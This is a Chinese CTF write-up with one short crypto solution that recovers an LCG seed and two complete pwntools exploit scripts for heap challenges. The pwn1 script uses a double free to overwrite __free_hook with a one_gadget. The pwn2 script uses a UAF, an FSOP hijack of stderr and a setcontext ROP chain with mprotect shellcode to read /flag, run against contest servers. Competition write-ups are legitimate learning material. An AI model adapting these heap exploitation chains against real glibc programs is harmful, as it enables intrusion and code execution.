和强网杯撞了,浅浅做完了pwn,其他的也不大会。

最近有点摸 wp 没有仔细整理,如果发现我真的写的很潦草影响到阅读的话可以去 🐧 戳我。

crypto

lcg,直接网上找的脚本

crypto1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# https://blog.csdn.net/superprintf/article/details/108964563#t3
from libnum import *
from Crypto.Util.number import *
from gmpy2 import *
from sympy import *
from z3 import *
p = 31893593182018727625473530765941216190921866039118147474754069955393226712079257707838327486268599271803
s=[25820280412859586557218124484272275594433027771091486422152141535682739897353623931875432576083022273940,
24295465524789348024814588142969609603624462580932512051939198335014954252359986260009296537423802567677,
14963686422550871447791815183480974143372785034397446416396172429864269108509521776424254168481536292904]
a = (s[2]-s[1])*invmod((s[1]-s[0]),p)
ani = invmod(a,p)
b = (s[1]-a*s[0])%p
seed = (ani*(s[0]-b))%p
print(long_to_bytes(seed))

pwn

pwn1

二血题

难点在交互,解决了 RSA 之后就比较好做了,采取的是在处理函数内部下断点,dump 出 n 和 e 的思路。

漏洞点在 free 时没有清空 content 指针,可以河里堆风水进行 Double Free。

image-20220729192811416

最后拿的 Fastbin Reverse Into Tcache 打 one gadget ,顺利拿到了 shell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
#!/usr/bin/env python2
# -*- coding: utf-8 -*
import re
import os
from pwn import *
from LibcSearcher import *
from libnum import *

se = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
sea = lambda delim,data :p.sendafter(delim, data)
rc = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
lg = lambda name,data : p.success(name + ': \033[1;36m 0x%x \033[0m' % data)

def debug(breakpoint=''):
glibc_dir = '~/Exps/Glibc/glibc-2.27/'
gdbscript = 'directory %smalloc/\n' % glibc_dir
gdbscript += 'directory %sstdio-common/\n' % glibc_dir
gdbscript += 'directory %sstdlib/\n' % glibc_dir
gdbscript += 'directory %slibio/\n' % glibc_dir
gdbscript += 'directory %self/\n' % glibc_dir
elf_base = int(os.popen('pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)).readlines()[1], 16) if elf.pie else 0
gdbscript += 'b *{:#x}\n'.format(int(breakpoint) + elf_base) if isinstance(breakpoint, int) else breakpoint
gdb.attach(p, gdbscript)
time.sleep(1)

elf = ELF('./pwn')
context(arch = elf.arch, os = 'linux',log_level = 'debug',terminal = ['tmux', 'splitw', '-hp','62'])
# p = process('./pwn')
# debug()
p = remote('tcp.dasc.buuoj.cn',27495)
P = 16617127
Q = 7578299081774973675168926220497127633745768478826174746554492422165802765780212810518589529228694315205511189705177457329278843566817056465274478392762585485827514172817826950842752547461016536920016232514874472692360067934908514830732106744500567245807025552586514363470336002166323093239378322678157
N = P*Q
PHI = (P-1)*(Q-1)
D = invmod(0x10001,PHI)

def add(size=0x10,content='u'*0x10,tf='n',name='\0'*40):
msg = str(0x101) + '\n' + name
msg = n2s((pow(s2n(msg),D,N)))
lg('LEN',len(msg))
sea('> ',str(msg).rjust(0x100,'\0'))
if tf == 'y':
sla('Want to add description?(y/n) ','y')
sea('size: ',str(size))
sea('content: ',str(content))
else:
sla('Want to add description?(y/n) ','n')

def dele(name):
msg = str(0x102) + '\n' + name
msg = n2s((pow(s2n(msg),D,N)))
lg('LEN',len(msg))
sea('> ',str(msg).rjust(0x100,'\0'))

def show():
msg = str(0x105) + '\n' + '\0'
msg = n2s((pow(s2n(msg),D,N)))
lg('LEN',len(msg))
sea('> ',str(msg).rjust(0x100,'\0'))

def edit(name,data):
msg = str(0x201) + '\n' + name + ';' + data
msg = n2s((pow(s2n(msg),D,N)))
lg('LEN',len(msg))
sea('> ',str(msg).rjust(0x100,'\0'))

msg = str(0x101) + '\n' + '\0'
msg = n2s((pow(s2n(msg),D,N)))
# msg = pack(msg)
# msg = cyclic(0x100)
# x/20xg $rebase(0x206090)
# x/20xg $rebase(0x206140)
# tel 0x7fffffffdd10 20
# add(0x10,name='AB1')
# x/20xg $rebase(0x2060A0)
add(0x450,tf='y',content='u',name='FK1'.ljust(8,'\0')+'NM1'.ljust(8,'\0')+'ND1'.ljust(8,'\0')+'\x01'.ljust(8,'\0')+'\x02'.ljust(8,'\0'))
add(0x10,name='FK2'.ljust(8,'\0')+'NM2'.ljust(8,'\0')+'ND2'.ljust(8,'\0')+'\x03'.ljust(8,'\0')+'\x04'.ljust(8,'\0'))


dele('FK1')
add(0x420,tf='y',content='u',name='FK1'.ljust(8,'\0')+'NM1'.ljust(8,'\0')+'ND1'.ljust(8,'\0')+'\x01'.ljust(8,'\0')+'\x02'.ljust(8,'\0'))

show()
libc_leak = uu64(ru('\x7f',drop=False)[-6:])
libc_base = libc_leak - 0x3ec075
lg('libc_leak',libc_leak)
lg('libc_base',libc_base)
#libc = ELF('./libc.so.6')
libc = elf.libc
libc.address = libc_base
system_addr = libc.sym.system
bin_sh = libc.search('/bin/sh').next()
magic = libc.sym.setcontext + 61
dele('FK1')
add(0x420,tf='y',content='u'*0x10,name='FK1'.ljust(8,'\0')+'NM1'.ljust(8,'\0')+'ND1'.ljust(8,'\0')+'\x01'.ljust(8,'\0')+'\x02'.ljust(8,'\0'))
show()
ru('u'*0x10)
heap_leak = uu64(rc(6))
heap_base = heap_leak - 0x330
lg('heap_leak',heap_leak)
lg('heap_base',heap_base)

add(0x50,tf='y',content='u'*0x10,name='AB0'.ljust(8,'\0')+'NM3'.ljust(8,'\0')+'ND3'.ljust(8,'\0')+'\x05'.ljust(8,'\0')+'\x06'.ljust(8,'\0'))
add(0x70,tf='y',content='u'*0x10,name='AB1'.ljust(8,'\0')+'NM4'.ljust(8,'\0')+'ND43'.ljust(8,'\0')+'\x07'.ljust(8,'\0')+'\x08'.ljust(8,'\0'))
dele('AB0')
dele('AB1')
add(0x50,tf='y',content='u'*0x10,name='AB3'.ljust(8,'\0')+'NM5'.ljust(8,'\0')+'ND5'.ljust(8,'\0')+'\x09'.ljust(8,'\0')+'\x0a'.ljust(8,'\0'))
add(0x20,tf='n',content='u'*0x10,name='AB0'.ljust(8,'\0')+'NM3'.ljust(8,'\0')+'ND3'.ljust(8,'\0')+'\x05'.ljust(8,'\0')+'\x06'.ljust(8,'\0'))
# for i in range(3):
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(0)).ljust(8,'\0')+('XX{}'.format(0)).ljust(8,'\0')+('CW{}'.format(0)).ljust(8,'\0')+str(p8((0))).ljust(8,'\0')+p8(1).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(1)).ljust(8,'\0')+('XX{}'.format(1)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((2))).ljust(8,'\0')+p8(3).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(2)).ljust(8,'\0')+('XX{}'.format(2)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((4))).ljust(8,'\0')+p8(5).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(3)).ljust(8,'\0')+('XX{}'.format(3)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((6))).ljust(8,'\0')+p8(7).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(4)).ljust(8,'\0')+('XX{}'.format(3)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((8))).ljust(8,'\0')+p8(9).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(5)).ljust(8,'\0')+('XX{}'.format(3)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((10))).ljust(8,'\0')+p8(11).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(6)).ljust(8,'\0')+('XX{}'.format(5)).ljust(8,'\0')+('CW{}'.format(6)).ljust(8,'\0')+str(p8((7))).ljust(8,'\0')+p8(12).ljust(8,'\0'))
# pause()
add(0x50,tf='y',content='u'*0x10,name=('CC{}'.format(0)).ljust(8,'\0')+('SW{}'.format(8)).ljust(8,'\0')+('AD{}'.format(6)).ljust(8,'\0')+str(p8((9))).ljust(4,'\0')+p8(13).ljust(8,'\0'))
# add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(7)).ljust(8,'\0')+('XX{}'.format(5)).ljust(8,'\0')+('CW{}'.format(6)).ljust(8,'\0')+str(p8((5))).ljust(8,'\0')+p8(11).ljust(8,'\0'))
# for i in range(7-1-i):
# dele('ZZ{}'.format(i))

dele('ZZ{}'.format(6))
dele('ZZ{}'.format(5))
dele('ZZ{}'.format(4))
dele('ZZ{}'.format(3))
dele('ZZ{}'.format(2))
dele('ZZ{}'.format(1))
dele('ZZ{}'.format(0))

dele('AB{}'.format(0))
dele('CC{}'.format(0))
dele('AB{}'.format(3))

add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(0)).ljust(8,'\0')+('XX{}'.format(0)).ljust(8,'\0')+('CW{}'.format(0)).ljust(8,'\0')+str(p8((0))).ljust(8,'\0')+p8(1).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(1)).ljust(8,'\0')+('XX{}'.format(1)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((2))).ljust(8,'\0')+p8(3).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(2)).ljust(8,'\0')+('XX{}'.format(2)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((4))).ljust(8,'\0')+p8(5).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(3)).ljust(8,'\0')+('XX{}'.format(3)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((6))).ljust(8,'\0')+p8(7).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(4)).ljust(8,'\0')+('XX{}'.format(3)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((8))).ljust(8,'\0')+p8(9).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(5)).ljust(8,'\0')+('XX{}'.format(3)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((10))).ljust(8,'\0')+p8(11).ljust(8,'\0'))
add(0x50,tf='y',content='/bin/sh\0',name=('ZZ{}'.format(6)).ljust(8,'\0')+('XX{}'.format(5)).ljust(8,'\0')+('CW{}'.format(6)).ljust(8,'\0')+str(p8((7))).ljust(8,'\0')+p8(12).ljust(8,'\0'))

add(0x50,tf='y',content=p64(libc.sym.__free_hook),name=('CC{}'.format(0)).ljust(8,'\0')+('SW{}'.format(8)).ljust(8,'\0')+('AD{}'.format(6)).ljust(8,'\0')+str(p8((9))).ljust(4,'\0')+p8(13).ljust(8,'\0'))
# add(0x50,tf='y',content='u'*0x10,name=('CC{}'.format(0)).ljust(8,'\0')+('SW{}'.format(8)).ljust(8,'\0')+('AD{}'.format(6)).ljust(8,'\0')+str(p8((9))).ljust(4,'\0')+p8(13).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('FF{}'.format(2)).ljust(8,'\0')+('SW{}'.format(8)).ljust(8,'\0')+('AD{}'.format(6)).ljust(8,'\0')+str(p8((1))).ljust(4,'\0')+p8(13).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('FF{}'.format(3)).ljust(8,'\0')+('SW{}'.format(8)).ljust(8,'\0')+('AD{}'.format(6)).ljust(8,'\0')+str(p8((2))).ljust(4,'\0')+p8(3).ljust(8,'\0'))
og = '''
0x4f2a5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL

0x4f302 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL

0xe534f execve("/bin/sh", r13, rbx)
constraints:
[r13] == NULL || r13 == NULL
[rbx] == NULL || rbx == NULL

0xe54f7 execve("/bin/sh", [rbp-0x88], [rbp-0x70])
constraints:
[[rbp-0x88]] == NULL || [rbp-0x88] == NULL
[[rbp-0x70]] == NULL || [rbp-0x70] == NULL

0xe54fe execve("/bin/sh", rcx, [rbp-0x70])
constraints:
[rcx] == NULL || rcx == NULL
[[rbp-0x70]] == NULL || [rbp-0x70] == NULL

0xe5502 execve("/bin/sh", rcx, rdx)
constraints:
[rcx] == NULL || rcx == NULL
[rdx] == NULL || rdx == NULL

0x10a2fc execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL

0x10a308 execve("/bin/sh", rsi, [rax])
constraints:
[rsi] == NULL || rsi == NULL
[[rax]] == NULL || [rax] == NULL
'''
ones = [libc_base + int(i,16) for i in re.findall(r'\n(.+?) execve',og)] + [libc_base + int(i,16) for i in re.findall(r'\n(.+?) posix_spawn',og)]
for i in range(len(ones)):
lg('ONES[%d]'%i,ones[i])
# add(0x50,tf='y',content='u'*0x10,name=('CC{}'.format(1)).ljust(8,'\0')+('SW{}'.format(2)).ljust(8,'\0')+('AD{}'.format(2)).ljust(8,'\0')+str(p8((3))).ljust(4,'\0')+p8(13).ljust(8,'\0'))
add(0x50,tf='y',content=p64(ones[1]),name=('FF{}'.format(4)).ljust(8,'\0')+('SW{}'.format(8)).ljust(8,'\0')+('AD{}'.format(8)).ljust(8,'\0')+str(p8((9))).ljust(4,'\0')+p8(3).ljust(8,'\0'))




# add(0x100,tf='y',content='u'*0x10,name='FK3'.ljust(8,'\0')+'NM3'.ljust(8,'\0')+'ND3'.ljust(8,'\0')+'\x05'.ljust(8,'\0')+'\x06'.ljust(8,'\0'))

p.interactive()

pwn2

一血题

这题的漏洞也很直接,就是一个 UAF,关键在堆风水和利用。

image-20220731231941452

但是每次 calloc 会清空堆块内容,leak libc 只能依赖 free 时的内容显示。

image-20220731232057742

后门函数,一次写固定值,一次任意写。

image-20220731232342257

具体思路

  1. 利用 UAF 构造 fastbin double free,leak 堆地址的同时去构造堆块重叠
  2. 分割 Largebin 至 tcache 范围内,避免再次 free 报错,利用 Offer by one 这个一次性函数填补 \x00 后 free,leak 出libc。
  3. 这样我们很轻易的可以控制 servant,进入后门函数
  4. 后门函数我采取的思路是不管固定值的这个,劫持 stderr 为堆地址,perror 进入 __vxprintf 触发 IO 流
  5. IO 流构造比较复杂,也是采取的调试改风水的思路,控制 _wide_data 结构体,setcontext 配合 gets 完成 shellcode 利用
  6. 详见 exp

Exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
#!/usr/bin/env python2
# -*- coding: utf-8 -*
import re
import os
from pwn import *
from LibcSearcher import *

se = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
sea = lambda delim,data :p.sendafter(delim, data)
rc = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
lg = lambda name,data : p.success(name + ': \033[1;36m 0x%x \033[0m' % data)

def debug(breakpoint=''):
glibc_dir = '~/Exps/Glibc/glibc-2.32/'
gdbscript = 'directory %smalloc/\n' % glibc_dir
gdbscript += 'directory %sstdio-common/\n' % glibc_dir
gdbscript += 'directory %sstdlib/\n' % glibc_dir
gdbscript += 'directory %slibio/\n' % glibc_dir
gdbscript += 'directory %self/\n' % glibc_dir
elf_base = int(os.popen('pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)).readlines()[1], 16) if elf.pie else 0
gdbscript += 'b *{:#x}\n'.format(int(breakpoint) + elf_base) if isinstance(breakpoint, int) else breakpoint
gdbscript += 'b *_IO_wdoallocbuf\n'
gdb.attach(p, gdbscript)
time.sleep(1)

elf = ELF('./pwn2')
context(arch = elf.arch, os = 'linux',log_level = 'debug',terminal = ['tmux', 'splitw', '-hp','62'])
# p = process('./pwn2')
# debug()
p = remote('tcp.dasc.buuoj.cn',23606)

sla("Your name: ",'u')

def menu(c):
sla('>> ',str(c))

def mage(trick):
menu('1')
sla("What's your trick?",str(trick))

def servant(id,name,info):
menu('2')
sla("Recruit Servant for which Mage?",str(id))
sla("Servant name: ",str(name))
sla("Servant info: ",str(info))

def dele(id,magic='n'):
menu('3')
sla('Which Mage?',str(id))
sla('Offer by one?',magic)

def delete(id):
menu('3')
sla('Which Mage?',str(id))
# if magic == 'y':
# se('u')

def attack(mage='n',id='0',chr='u'):
menu('4')
sla("Would you like to select a Mage to attack ?",mage)
if mage == 'y':
sla("Which Mage ?",str(id))


mage("fuck0".ljust(0x18,'\0')+p64(0x51)+'\0'*8)
servant(0,'nmsl','wsnd')
for i in range(1,0x11):
mage("fuck{}".format(i))

for i in range(7):
attack('y',10-1-i)

attack('y','1')
dele(2)
dele(1)
ru('Expel Mage, whose trick is: ')
heap_leak = uu64(rc(5))
heap_base = heap_leak << 12
lg('heap_leak',heap_leak)
lg('heap_base',heap_base)

mage(p64(heap_leak^(heap_base+0x2b0))) # 0x11
mage('fuckx12') # 0x12
mage('fuckx13') # 0x13

dele(0)
mage("fuckx14".ljust(0x18,'\0')+p64(0x51)+p64(heap_leak)) # 0x14


menu('1')
sea("What's your trick?",str('\x01'*0x28+p32(0x21)+'\0'*3)) # 0x15

# attack('n','1')
dele(0x14)
mage("fuckx16".ljust(0x18,'\0')+p64(0x461)+p64(heap_leak)) # 0x16
# attack('y',0xf)

dele(0x15)

mage("fuckx17".ljust(8,'\0')+p32(0x7fffff01)+p32(0x123456)+p64(heap_base+0x2c0)) # 0x17

dele(0x1,'y')
libc_leak = uu64(ru('\x7f',drop=False)[-6:])
libc_base = libc_leak - 0x1e0c0a
lg('libc_leak',libc_leak)
lg('libc_base',libc_base)
#libc = ELF('./libc.so.6')
libc = elf.libc
libc.address = libc_base
system_addr = libc.sym.system
bin_sh = libc.search('/bin/sh').next()
magic = libc.sym.setcontext + 61
_IO_wfile_jumps = libc_base + 0x1e1f60
stderr = libc_base + 0x1e17a0
# x/20xg 0x555555606600
delete(0xa)
mage(("fuckx18\0"+p64(heap_base+0x200)).ljust(0x20,'\0')+p64(heap_base+0x690)) # 0x18
delete(0xb)
mage(p64(0)+p64(_IO_wfile_jumps-0x20)) # 0x19
rdi = 0x0000000000028a55 + libc_base
ret = 0x0000000000026699 + libc_base
rsi = 0x000000000002a4cf + libc_base
rdx = 0x00000000000c7f32 + libc_base
delete(0xd)
mage(p64(rdi)+p64(heap_base+0x6d0)+p64(libc.sym.gets)) # 0x19


delete(0xe)
mage(p64(0)+p64(libc.sym.gets)+p64(heap_base+0x6d0)+p64(ret)) # 0x19
delete(0xf)
mage(p64(heap_base+0x778-0x68)+p64(magic)) # 0x19

menu('4')
sea('LEAVE MY NAME: ',p64(heap_base+0x100))
sea('WRITE YOUR NAME: ',p64(stderr))
# pause()
se(p64(heap_base+0x600-0xa0))

rop_chain = p64(heap_base+0x300)
rop_chain += 'u'*0x10
rop_chain += p64(rdi) + p64(heap_base) + p64(rsi) + p64(0x2000) + p64(rdx) + p64(7) + p64(libc.sym.mprotect) + p64(heap_base+0x728)
rop_chain += asm(shellcraft.cat('/flag')+shellcraft.exit(0))
sleep(3)
sl(rop_chain)
'''
0x7ffff7e30d91 <perror_internal+81> lea rsi, [rip + 0x14f54f]
0x7ffff7e30d98 <perror_internal+88> xor eax, eax
► 0x7ffff7e30d9a <perror_internal+90> call __fxprintf <__fxprintf>
rdi: 0x555555606560 ◂— 0x0
rsi: 0x7ffff7f802e7 ◂— 0xa732573257325 /* '%s%s%s\n' */


0x7ffff7e453f6 <__vfprintf_internal+262> mov rsi, qword ptr [rsp + 8]
0x7ffff7e453fb <__vfprintf_internal+267> mov rdx, rbx
0x7ffff7e453fe <__vfprintf_internal+270> mov rdi, rbp
► 0x7ffff7e45401 <__vfprintf_internal+273> call qword ptr [r12 + 0x38] <_IO_wfile_xsputn>
rdi: 0x555555606560 ◂— 0x0
rsi: 0x7ffff7f802e7 ◂— 0xa732573257325 /* '%s%s%s\n' */
rdx: 0x0
rcx: 0xd68
0x7ffff7e54a52 <_IO_wdoallocbuf+34> jne _IO_wdoallocbuf+152 <_IO_wdoallocbuf+152>

0x7ffff7e54a54 <_IO_wdoallocbuf+36> mov rax, qword ptr [rax + 0xe0]
► 0x7ffff7e54a5b <_IO_wdoallocbuf+43> call qword ptr [rax + 0x68]

0x7ffff7e54a5e <_IO_wdoallocbuf+46> cmp eax, -1


0x0000000000028a55 : pop rdi ; ret
0x0000000000112a51 : pop rdx ; pop r12 ; ret
0x00000000001574e6 : pop rdx ; pop rbx ; ret
0x00000000000fc103 : pop rdx ; pop rcx ; pop rbx ; ret
0x00000000000c7f32 : pop rdx ; ret
0x0000000000095982 : pop rdx ; ret 0x11
0x0000000000093342 : pop rdx ; ret 0xfffc
0x0000000000028db0 : pop rsi ; pop r15 ; pop rbp ; ret
0x0000000000028a53 : pop rsi ; pop r15 ; ret
0x000000000002a4cf : pop rsi ; ret
0x0000000000028dac : pop rsp ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret
0x0000000000028a4f : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000002a4cb : pop rsp ; pop r13 ; pop r14 ; ret
0x0000000000043922 : pop rsp ; pop r13 ; pop rbp ; ret
0x000000000002a04c : pop rsp ; pop r13 ; ret
0x00000000000de0e6 : pop rsp ; pop rbp ; ret
0x0000000000033af2 : pop rsp ; ret
0x0000000000026699 : ret
'''
# dele(0xf)

# menu(5)
p.interactive()